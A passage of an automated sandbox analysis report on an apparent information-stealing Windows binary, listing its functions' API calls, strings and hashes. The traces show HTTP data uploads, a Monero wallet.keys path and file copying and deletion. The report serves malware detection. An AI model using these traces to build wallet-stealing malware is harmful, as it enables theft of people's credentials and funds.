Instruction Fuzzy Hash: D4D12471900218ABCB08EBF4ED96DEE7778FF54701F404518F502E6191EF75AA86CB62

Function 00815100 Relevance: 51.3, APIs: 19, Strings: 10, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

Part of subcall function 008147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814839
Part of subcall function 008147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814849

lstrlen.KERNEL32(00000000), ref: 00815193

Part of subcall function 00828EA0: CryptBinaryToStringA.CRYPT32(00000000,00815184,40000001,00000000,00000000,?,00815184), ref: 00828EC0

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00815207
StrCmpCA.SHLWAPI(?,00EFE270), ref: 00815225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00815340
HttpOpenRequestA.WININET(00000000,00EFE2C0,?,00EFDB60,00000000,00000000,00400100,00000000), ref: 008153A4

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,00EFE310,00000000,?,00EF9D38,00000000,?,008319DC,00000000,?,008251CF), ref: 00815737
lstrlen.KERNEL32(00000000), ref: 0081574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0081575C
RtlAllocateHeap.NTDLL(00000000), ref: 00815763
lstrlen.KERNEL32(00000000), ref: 00815778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008157A9
lstrlen.KERNEL32(00000000), ref: 008157C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008157E1
lstrlen.KERNEL32(00000000,?,?), ref: 0081580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00815822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0081584D
InternetCloseHandle.WININET(00000000), ref: 008158B1
InternetCloseHandle.WININET(00000000), ref: 008158BE
InternetCloseHandle.WININET(00000000), ref: 008158C8

Strings

------, xrefs: 00815297
--, xrefs: 00815280
", xrefs: 00815482
", xrefs: 00815706
------, xrefs: 008154F9
", xrefs: 008155C4
p, xrefs: 00815217
------, xrefs: 0081563B
------, xrefs: 008153B7
, xrefs: 00815458

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$ $"$"$"$--$------$------$------$p
API String ID: 1224485577-1100857535
Opcode ID: bb446ceeefdc1fd0df40a7ae2d9ca21ea35044b3090db77cf7adaf82588aaf1f
Instruction ID: 1933253afd7bbd65c137cb31510f25b77649dfad56a118cac40fd958f6b96915
Opcode Fuzzy Hash: bb446ceeefdc1fd0df40a7ae2d9ca21ea35044b3090db77cf7adaf82588aaf1f
Instruction Fuzzy Hash: 47321171920128ABDB18EBA4EC95FEEB378FF54700F404169F516E2092DF746A89CF52

Function 00815960 Relevance: 42.5, APIs: 17, Strings: 7, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

Part of subcall function 008147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814839
Part of subcall function 008147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814849

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008159F8
StrCmpCA.SHLWAPI(?,00EFE270), ref: 00815A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00815B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00EFE300,00000000,?,00EF9D38,00000000,?,00831A1C), ref: 00815E71
lstrlen.KERNEL32(00000000), ref: 00815E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00815E93
RtlAllocateHeap.NTDLL(00000000), ref: 00815E9A
lstrlen.KERNEL32(00000000), ref: 00815EAF
lstrlen.KERNEL32(00000000), ref: 00815ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00815EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00815F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00815F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00815F4C
InternetCloseHandle.WININET(00000000), ref: 00815FB0
InternetCloseHandle.WININET(00000000), ref: 00815FBD
HttpOpenRequestA.WININET(00000000,00EFE2C0,?,00EFDB60,00000000,00000000,00400100,00000000), ref: 00815BF8

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

InternetCloseHandle.WININET(00000000), ref: 00815FC7

Strings

------, xrefs: 00815A96
p, xrefs: 00815A08
", xrefs: 00815E16
------, xrefs: 00815C0B
------, xrefs: 00815D4C
", xrefs: 00815CD5
, xrefs: 00815CAC

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: $"$"$------$------$------$p
API String ID: 874700897-165016810
Opcode ID: 9015e6d051246f85620b2c9bc9e73fab289da0d2c40f64ffa456b92a2a4214b6
Instruction ID: 3de50ea56a3ffbfbcc2cc443cb29eb342aa3b6d9ff2b570326be8688e99ecd3b
Opcode Fuzzy Hash: 9015e6d051246f85620b2c9bc9e73fab289da0d2c40f64ffa456b92a2a4214b6
Instruction Fuzzy Hash: F1120271920128ABDB19EBA4EC95FDEB378FF54700F504169F506E2091DF702A8ACF56

Function 0081A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0082AA70: StrCmpCA.SHLWAPI(00EF8940,0081A7A7,?,0081A7A7,00EF8940), ref: 0082AA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0081AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0081AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0081ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081A8B0

Part of subcall function 0082A820: lstrlen.KERNEL32(00814F05,?,?,00814F05,00830DDE), ref: 0082A82B
Part of subcall function 0082A820: lstrcpy.KERNEL32(00830DDE,00000000), ref: 0082A885

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

lstrcat.KERNEL32(?,00000000), ref: 0081ACEB
lstrcat.KERNEL32(?,00831320), ref: 0081ACFA
lstrcat.KERNEL32(?,00000000), ref: 0081AD0D
lstrcat.KERNEL32(?,00831324), ref: 0081AD1C
lstrcat.KERNEL32(?,00000000), ref: 0081AD2F
lstrcat.KERNEL32(?,00831328), ref: 0081AD3E
lstrcat.KERNEL32(?,00000000), ref: 0081AD51
lstrcat.KERNEL32(?,0083132C), ref: 0081AD60
lstrcat.KERNEL32(?,00000000), ref: 0081AD73
lstrcat.KERNEL32(?,00831330), ref: 0081AD82
lstrcat.KERNEL32(?,00000000), ref: 0081AD95
lstrcat.KERNEL32(?,00831334), ref: 0081ADA4
lstrcat.KERNEL32(?,00000000), ref: 0081ADB7
lstrlen.KERNEL32(?), ref: 0081AE0D
lstrlen.KERNEL32(?), ref: 0081AE1C

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

DeleteFileA.KERNEL32(00000000), ref: 0081AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0081ABD4

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: 78d2b4147f5def8d62958d79a3b30f9c9d798529872ff521c742338e3b699c0b
Instruction ID: ebcff90c4dc8fc1445ee4b14afbf3a96457870a9fe13aa255459f755ef0380f6
Opcode Fuzzy Hash: 78d2b4147f5def8d62958d79a3b30f9c9d798529872ff521c742338e3b699c0b
Instruction Fuzzy Hash: 33121F71910118ABCB08EBA4ED96DEE7378FF64301F504168F507E6191DE356E8ACBA3

Function 0081CEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

Part of subcall function 00828B60: GetSystemTime.KERNEL32(00830E1A,00EF9A98,008305AE,?,?,008113F9,?,0000001A,00830E1A,00000000,?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 00828B86

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0081D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0081D0CE
lstrcat.KERNEL32(?,00000000), ref: 0081D208
lstrcat.KERNEL32(?,00831478), ref: 0081D217
lstrcat.KERNEL32(?,00000000), ref: 0081D22A
lstrcat.KERNEL32(?,0083147C), ref: 0081D239
lstrcat.KERNEL32(?,00000000), ref: 0081D24C
lstrcat.KERNEL32(?,00831480), ref: 0081D25B
lstrcat.KERNEL32(?,00000000), ref: 0081D26E
lstrcat.KERNEL32(?,00831484), ref: 0081D27D
lstrcat.KERNEL32(?,00000000), ref: 0081D290
lstrcat.KERNEL32(?,00831488), ref: 0081D29F
lstrcat.KERNEL32(?,00000000), ref: 0081D2B2
lstrcat.KERNEL32(?,0083148C), ref: 0081D2C1
lstrcat.KERNEL32(?,00000000), ref: 0081D2D4
lstrcat.KERNEL32(?,00831490), ref: 0081D2E3

Part of subcall function 0082A820: lstrlen.KERNEL32(00814F05,?,?,00814F05,00830DDE), ref: 0082A82B
Part of subcall function 0082A820: lstrcpy.KERNEL32(00830DDE,00000000), ref: 0082A885

lstrlen.KERNEL32(?), ref: 0081D32A
lstrlen.KERNEL32(?), ref: 0081D339

Part of subcall function 0082AA70: StrCmpCA.SHLWAPI(00EF8940,0081A7A7,?,0081A7A7,00EF8940), ref: 0082AA8F

DeleteFileA.KERNEL32(00000000), ref: 0081D3B4

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: bb17a68b3704fd4e4c4e044637cc739c39c6b3e4dd1b74e68b480b5b640c9652
Instruction ID: dc4c8671a6dffe47e4a4b11462947cea113ad76f46c0d3e797cc7b7cdd8a476c
Opcode Fuzzy Hash: bb17a68b3704fd4e4c4e044637cc739c39c6b3e4dd1b74e68b480b5b640c9652
Instruction Fuzzy Hash: 3EE11171910218ABCB08EBE4ED96EEE7378FF54701F104168F107E6191DE35AA86CB67

Function 00816280 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

Part of subcall function 008147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814839
Part of subcall function 008147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814849

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

InternetOpenA.WININET(00830DFE,00000001,00000000,00000000,00000000), ref: 008162E1
StrCmpCA.SHLWAPI(?,00EFE270), ref: 00816303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00816335
HttpOpenRequestA.WININET(00000000,GET,?,00EFDB60,00000000,00000000,00400100,00000000), ref: 00816385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008163BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008163D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 008163FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0081646D
InternetCloseHandle.WININET(00000000), ref: 008164EF
InternetCloseHandle.WININET(00000000), ref: 008164F9
InternetCloseHandle.WININET(00000000), ref: 00816503

Strings

GET, xrefs: 0081637C
p, xrefs: 008162F8
ERROR, xrefs: 008164C9
ERROR, xrefs: 00816407

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET$p
API String ID: 3749127164-3179073690
Opcode ID: be1cea81cdd5ce06ebee7f8dd1c24eaa57dc7efd028a5a67343c768a69bc866f
Instruction ID: 28f6178281048b17467d2a427e5b66f727f0aef0d5ea7b4cc165e40dc1eadf92
Opcode Fuzzy Hash: be1cea81cdd5ce06ebee7f8dd1c24eaa57dc7efd028a5a67343c768a69bc866f
Instruction Fuzzy Hash: 57711D71A00218ABDB14DBE4DC59BEE77B8FF44701F108198F50AAB191EBB46A85CF52

Function 00825510 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A820: lstrlen.KERNEL32(00814F05,?,?,00814F05,00830DDE), ref: 0082A82B
Part of subcall function 0082A820: lstrcpy.KERNEL32(00830DDE,00000000), ref: 0082A885

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00825644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008256A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00825857

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

Part of subcall function 008251F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00825228

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

